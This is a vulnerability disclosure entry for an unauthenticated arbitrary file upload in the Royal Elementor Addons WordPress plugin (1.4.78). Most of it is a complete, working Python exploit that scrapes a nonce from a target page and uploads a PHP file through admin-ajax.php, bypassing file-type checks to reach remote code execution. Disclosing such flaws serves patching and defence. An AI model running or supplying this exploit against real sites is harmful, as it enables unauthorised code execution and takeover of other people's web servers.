Royal Elementor Addons and Templates 1.4.78 - Unauthenticated Arbitrary File Upload

2023-10-2300:00:00

Fioravante Souza

elementor

unauthenticated

file upload

security

exploit

9.6 High

AI Score

Confidence

High

0.911 High

EPSS

Percentile

98.9%

JSON

Description The plugin does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE. Note that this vulnerability is identical to https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/ as it was introduced in the 1.4.x branch in error.

Make sure you have Elementor installed and a page or post edited with Elementor.

Here's the python script that will execute the exploit.

from io import StringIO
import requests
from urllib import parse
import json
import sys
import re
import io

if len(sys.argv) != 2:
 print('USAGE: python %s <target_elementor_page>' % (sys.argv[0],))
 sys.exit()

elementor_url = sys.argv[1].rstrip('/')
parsed_url = parse.urlparse(elementor_url)
root_url = f'{parsed_url.scheme}://{parsed_url.netloc}'

with requests.Session() as s:
 print('# Getting nonce..')
 page = s.get(elementor_url).text
 nonce = re.search(r'WprConfig = \{.*"nonce":"([a-f0-9]+)"', page).groups()
 if len(nonce) == 0:
  print('Error: Couldn\'t get nonce.')
  sys.exit()
 nonce = nonce[0]

 print('# Uploading shell..')
 shell = io.BytesIO(b'<?php phpinfo();')
 data = {
  'wpr_addons_nonce': nonce,
  'max_file_size': 100,
  'allowed_file_types': ',',
  'action': 'wpr_addons_upload_file',
  'triggering_event': 'click',
 }
 file = {
  'uploaded_file': ('phpinfo.php.', shell),
 }
 print(requests.post(f'{root_url}/wp-admin/admin-ajax.php', data=data, files=file).text)